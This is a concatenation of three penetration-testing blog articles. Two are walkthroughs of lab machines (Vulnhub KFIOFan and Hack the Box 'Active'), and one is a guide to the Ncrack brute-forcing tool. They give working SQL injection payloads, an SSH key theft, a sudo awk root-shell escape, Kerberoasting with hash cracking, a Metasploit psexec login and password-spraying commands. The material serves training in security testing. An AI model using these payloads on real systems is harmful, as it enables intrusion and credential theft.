KFIOFan:1 Vulnhub Walkthrough

Hello friends!! Today we are going to take another boot2root challenge known as KFIOFan. This lab is design in French language and involve Geographical coordinates factor of France to Begin this CTF where you have to find 4 flags by using your web penetration testing skill because this machine is vulnerable to SQL.

Official Description : Two french people want to start the very first fanclub of the youtuber Khaos Farbauti Ibn Oblivion. But they're not very security aware ! (IMPORTANT NOTE : The whole challenge is in french, including server conf. Which may add to the difficulty if you are non-native or using a non-azerty keyboard)

You can download this VM here.

Penetration Methodology

Network Scanning

§  Open port and Running Service (Nmap)

Enumeration

§  Abusing Http service for obtaining Credential

§  Use robot.txt for first flag

Exploit

§  Exploiting SQL vulnerability

§  Obtain SSH RSA_Key

§  SSH Login

§  Catch another flag

Privilege Escalation

§  Check Sudo rights

§  Spwan root access

§  Capture the last flag

Walkthrough

Network Scanning

Let’s start off with scanning the network to find our target.

nmap -A 192.168.1.105

So from nmap we found two ports (22, 80) are open in the target’s machine, therefore let’s navigate to port 80 in the browser.

Enumeration

On exploring port 80, we notice it required authentication but we don’t know that. Moreover there was a text message (This site says: “48.416667 -0.916667”) which was pointing towards some Geographical coordinates.

When we canceled the authentication page, we saw a message in French language which was saying “Let me guess Bob, did you lose your password again? LOL”. Here we considered Bob as authorized username.

On searching 48.416667 -0.916667 coordinates in Google map, we get the location “Levaré” which could be the possible password for user Bob.

Hmmmm!! So our prediction was true and we successfully bypass HTTP authentication using Bob: Levaré

Note: Well this was not that much easier because on reboot this machine the Geo coordinates gets changed and you will get the password accordingly.

Luckily, on exploring /robot.txt, I found our first flag randomly which was in French language and again I translate it here:

FLAG1: Congratulations you found the first flag! (Yes I know you're hoping for a clue but at least you have the right reflexes!)

As officially describe above “Two french people want to start the very first fanclub of the youtuber” and from the given web page we can easily read the name of that two people (Alice and Bob) are usernames.

Exploit

Again I translate the whole text of this web page and conclude user “Alice” holds some very crucial information or any important file such as SSH key.

A link on Khaosearch brings me on the search form for the CTF author's YouTube channel, without wasting time I check for sql injection by injecting following query:

raj" union select 1,2;#

Lol J ! It was vulnerable to SQL injections, let’s exploit quickly.

With the help of following query we try to all table and column names from inside the database.

raj" union select table_name, column_name from information_schema.columns;#

I stumped when I saw an entry for SSH_Key, then I decided to check it, as it seems the most exciting.

I found another link as Alice when inject following query to check ssh_key

raj" union select * from ssh_keys;

Alice was holding Private SSH_Key which should be open properly, therefore I visit source code of this page here.

Then copy the RSA Key from -----BEGIN RSA PRIVATE KEY----- to -----END RSA PRIVATE KEY----- and past in a text file as “id_rsa” then set permission 600 for proper authentication.

chmod 600 id_rsa

Privilege Escalation

Now then connect to ssh using above key and run following command:

ssh alice@192.168.1.105 -i id_rsa

ls

cat flag3.txt

So we have successfully connected to ssh and found 3^rd flag also.

FLAG 3: Congratulations for coming here. This shows that you master very well the essential concepts! One last little effort and the root is yours!

For finding 4^th flag we need to escalate root privilege, let’s identify sudo rights for alice with the help of following command.

sudo -l

Hmmm!! So here alice can run awk as root without using password and we can easily spawn root shell by exploit this permission

sudo awk 'BEGIN {system("/bin/bash")}'

ls

cat flag4.txt

FLAG 4: COMPLETE! Congratulations to you for coming here: the machine is yours, its survival or destruction is now entirely based on your ethics. Good luck Hacker!

Note: On rebooting this VM machine the Geo coordinates get changed each time which will also affect password and SSH key and you get new password and SSH_key each time.

Hack the Box: Active Walkthrough

Today we are going to solve another CTF challenge “Active”. Active is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Penetration Methodologies

Scanning Network

§  Open ports and Running services (Nmap)

Enumeration

§  Identify share files (Linux4enum)

§  Access share file via Anonymous login (smbclient)

§  Decrypting cpassword (Gpprefdecrypt.py)

Access Victim’s Shell via SMB connect

§  Access share file user login

§  Get User.txt

Privilege Escalation

§  Find Service Principal Names (GetUserSPNs.py)

§  Crack the hash (Hashcat)

§  Psexec Exploit (Metasploit)

§  Get root.txt

Walkthrough

Scanning Network

Note: Since these labs are online available therefore they have a static IP. The IP of Active is 10.10.10.100

Let’s start off with our basic nmap command to find out the open ports and services.

nmap -sV 10.10.10.100

As you can observe from Nmap scanning result, there are so many open ports along with their running services, the OS is Microsoft Windows server 2008:r2:sp1 and you can also read the domain name “active.htb”.

Enumeration

I try eternal blue attack when I saw port 445 was open but I guess this was Patched version of SMB, therefore I have to start with enum4linux script. As we all know it is the best script for SMB enumeration.

./enum4liux -S 10.10.10.100

It has shown anonymous login for /Replication share file.

Then I try to access /Replication with the help smbclient and run the following command to access this directory via anonymous account:

smbclient //10.10.10.100/Replication

Here I downloaded Groups.xml file which I found from inside the following path:

\active.htb\Policies\{31B2F340–016D-11D2–945F-00C04FB984F9}\MACHINE\Preferences\Groups\

So here I found cpassword attribute value embedded in the Groups.xml for user SVC_TGS.

Therefore I download a python script “Gpprefdecrypt” from GitHub to decrypt the password of local users added via Windows 2008 Group Policy Preferences (GPP) and obtain the password: GPPstillStandingStrong2k18.

python Gpprefdecrypt.py < cpassword attribute value >

Access Victim’s Shell via SMB connect

Using above credential we connect to SMB with the help of following command and successfully able to catch our 1^st flag “user.txt” file.

smbclient //10.10.10.100/Users -U SVC_TGS

Now, it’s time to hunt root.txt file and as always seen that for obtain root.txt file we need to escalated root privilege, therefore let’s add Host_IP and Host_name inside /etc/hosts file in our local machine.

Privilege Escalation

In nmap scanning result we saw port 88 was open for Kerberos, hence their much be some Service Principal Names (SPN) that are associated with normal user account. Therefore we downloaded and install impacket from Github for using its python class GetUserSPN.py

./GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18

I copied the hash value into a text file “hash.txt” for its decryptions.

Then with the help of hashcat we find out the hash mode and as result it shown 13100 for Kerberos 5 TGS-REP etype 23

hashcat -h |grep -i tgs

Finally, it was time to crack the hashes and obtain the password by using rockyou.txt wordlist.

hashcat -m 13100 hash.txt -a 0 /usr/share/wordlists/rockyou.txt --force ---show

Hurray!!! We got it, Ticketmaster1968 for administrator.

Without wasting time I load metaploit framework and run following module to spawn full privilege system shell.

msf > use exploit/windows/smb/psexec

msf exploit windows/smb/psexec) > set rhost 10.10.10.100

msf exploit(windows/smb/psexec) > set smbuser administrator

msf exploit(windows/smb/psexec) > set smbpass Ticketmaster1968

msf exploit(windows/smb/psexec) > exploit

BOOOMMM…………………

Now we are inside the root shell, let’s chase towards root.txt file and finish this challenge.

Yuppieee! We found our 2^nd flag the root.txt file form inside /Users/Administrator/Desktop.

Comprehensive Guide on Ncrack - A Brute Forcing Tool

Comprehensive Guide on Ncrack -  A Brute Forcing Tool

In this article we will be exploring the topic of network authentication using Ncrack. Security professionals depends on Ncrack while auditing their clients. The tools is very simple, yet robust in what it offers a penetration tester. It was design to help the companies in securing their networks by analysis all their hosts and networking devices for weak passwords.

Table of Content

INTRODUCTION TO NCRACK

§  Exploring Modules

AUTHENTICATION PHASE

§  Basic Attack

§  Dictionary Attack

§  Brute Force Attack

§  Pairwise Attack

MISC PHASE

§  Resume the Attack

§  Stop on Success

§  Obtain Result in List Format

OUTPUT FORMAT

§  Normal text File

§  All Format At Once

§  Append output

§  Nsock Trace

TIMING AND PERFORMANCE

§  Timing Templates

§  Service-Specific Options

TARGET SPECIFICATION

§  Input from Nmap's XML

§  Input from Text file

§  Exclude Host from List

  

INTRODUCTION TO NCRACK

Ncrack is a network authentication tool, it helps pentesters find out how vulnerable the credentials protecting a network’s access are. The tool is a part of the Kali Linux arsenal and comes preinstalled with the package. It also has a unique feature to attack multiple targets at once, which is not seen very often in such tools.

Ncrack can be started by typing “ncrack” in the terminal. This shows us all the different options the tool provides us.

ncrack

syntax: ncrack [Options] {target:service specification/port number}

Exploring Modules

Ncrack is a very versatile tool, it has modules to test most of the popular forms of network authentication. We can see this by checking the modules.

ncrack –V

AUTHENTICATION PHASE

Basic Attack

We have define this attack as basic because at this phase we only know that port 21 is enable for FTP service on victim’s machine. So with the help of the following command we will try to find out possible FTP login credential.

ncrack ftp://192.168.0.105

On executing above command it will try to crack password for anonymous login account as shown in the given below image.

Dictionary Attack

Suppose you are willing to obtain correct login credential for any account such FTP, SSH or HTTP when you having following situations:

Situation1- Know only username but don’t know the password

Situation2- Don’t know username but know the password

Situation3- Neither have username nor the password

In such situation, you should use a wordlist dictionary and then go with ncrack command respectively:

ncrack -user msfadmin -P pass.txt 192.168.0.105:21

ncrack -U user.txt -pass msfadmin 192.168.0.105:21

ncrack -U user.txt -P pass.txt 192.168.0.105:21

Brute Force Attack

Now whenever you consider yourself in following situations:

Suitation1- Close assumption of few usernames and passwords for any host:service and don’t want to use dictionary then you can go with following command, this will reduce our effort of guessing truthful credential.

ncrack -user msfadmin,ignite -pass msfadmin,123 ftp://192.168.0.106

Suitation2- Close assumption of usernames and passwords but there multiple hosts in a network and guessing valid login for destination machine is much time taken process.

Again with the help of ncrack following command you will be able to crack valid login for any host present in the network.

ncrack -user msfadmin,ignite -pass msfadmin,123 192.168.0.1/24:21

Pairwise Attack

Ncarck lets us choose sets of credentials, basically pairing them in row and column index which mean 1^st username from user.txt file will pair with 1^st password of pass.txt file.

If you are not giving any dictionary, then ncrack will go with its default dictionary for pairing password for anonymous login.

ncrack -v --pairwise 192.168.0.105:21

From the given below image you can observe that we had made successful FTP login with the help of paired password matthew.

MISC PHASE

Resume the Attack

This is probably the feature that takes the cake. We all know how frustrating the loss of connection or any other technical interruption can be during testing, this is where Ncrack is blessing. If your attack gets interrupted, you can pick it right up from where you were.

ncrack --resume /root/.ncrack/restore.2018-12-05_04-36

Stop on Success

As you have seen in above attack that it keep on cracking the service until it finds the all possible logins but if you want that, the attack should quit cracking service after finding one credential then you should add -f option in the ncrack command.

ncrack -v --pairwise 192.168.0.105:21-f

Obtain Result in List Format

It always matter that how will you maintain your penetration testing report and output result while presenting them. Sometime it is quite hectic to arrange the result in well polish look especially at that time when you have to penetrate multiple host machine. To shoot such hotchpotch, the ncrack has added -sL option which will generate result in a list format.

ncrack ssh://192.168.0.105 ssh://192.168.0.106 -sL

OUTPUT FORMAT

Normal text File

If you want to store the output of ncrack result in a Text/XML format.

Then you can go with -oN option to save the result in a text file with the help of given below command and later can use cat command to read the information saved inside that file.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oN normal.txt

cat normal.txt

Or you can switch to -oX option to save the output result in XML format.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oX save.xml

All Format At Once

Suppose you want to store the output of ncrack result in both format (.txt, .xml) then you can choose -oA option while executing command.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.105:21 -oA output

As you can observe that it has stored the result in two format as “output.ncrack” and “output.xml”.

Append output

If the testing is being done in iterations, Ncrack gives us the option to append or add the output to an existing file with ease.

As you can observe that when we try to crack ftp service for host: 192.168.0.106, it gives ignite:123 as login credential that I had save in a text file.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 192.168.0.106:21 -oN normal.txt

But on crack SMB service for host: 192.168.0.105, it gives msfadmin:msfadmin as login credential and here I had append the output in previous text file.

ncrack -U user.txt -P pass.txt 192.168.0.105:445 -oN normal.txt --append-output

Conclusion: so by reading normal.txt file we got both output result at one place rather than clobber specified output files.

Nsock Trace

Ncarck lets us run nsock trace on our target while attacking it, we can set the trace level anywhere from 0 to 10 depending on our objective. The output from this operation is quite large.

ncrack -U user.txt -P pass.txt 192.168.0.106:21 --nsock-trace 2

We weren’t kidding when we said the output is large!

TIMING AND PERFORMANCE

Timing Templates

Timing template in ncrack is defined by –T<0-5> having -T0 as the slowest and –T5 as the fastest. By default all ncrack scans run on –T3 timing template. Timing template in Ncrack is used to optimize and improve the quality and performance of scan to get desired results.

T5: Insane Scan

T4: Aggressive Scan

T3: Normal Scan

T2: Polite Scan

T1: Sneaky Scan

ncrack -U user.txt -P pass.txt 192.168.0.105:21 -T1

As you can observe from the given below image that it took 187.57 seconds and for this reason T0 and T1 is use to evade from firewall and IDS/IPS.

ncrack -U user.txt -P pass.txt 192.168.0.105:21 -T5

ncrack -U user.txt -P pass.txt 192.168.0.105:21

On executing above command you can comparing the time of completing the process in both result, it took 15.01 seconds during T5 and 24.00 second during default (T3).

Service-Specific Options

cl (min connection limit): minimum number of concurrent parallel connections

CL (max connection limit): maximum number of concurrent parallel connections

at (authentication tries): authentication attempts per connection

cd (connection delay): delay between each connection initiation

cr (connection retries): caps number of service connection attempts

to (time-out): maximum cracking for service, regardless of success so far

You can use above option while penetrating whole network for cracking any service.

ncrack ssh://192.168.0.105 -m ftp:cl=10,CL=30,at=5,cd=2ms,cr=10,to=2ms -sL -d

TARGET SPECIFICATION

Input from Nmap's XML

You might be aware of Nmap tool its functionality, suppose while scanning network with the help of nmap you have stored its result in xml format then you can use ncrack -iX option to crack the running services with the help of xml file format.

ncrack -user ignite -pass 123 -iX nmap.xml

As you can observe from the given image that ncrack itself, cracked the password for FTP without specifying any service or port in the command.

Input from Text file

Executing command again and again on multiple host is quite time consuming efforts, therefore, you can place all host IP in a text file and then use it for cracking any particular service.

ncrack -U user.txt -P pass.txt -iL host.txt -p21

Exclude Host from List

Suppose you are using a list that contains multiple IP or range of IP and you don’t want to crack service for a specific IP then you can use --exclude option to eliminate that particular IP from list of hosts.

ncrack -U user.txt -P pass.txt -iL host.txt -p21 --exclude 192.168.0.106

As you can observe, this time it does not crack for 192.168.0.106 and shown the result for the remaining IP.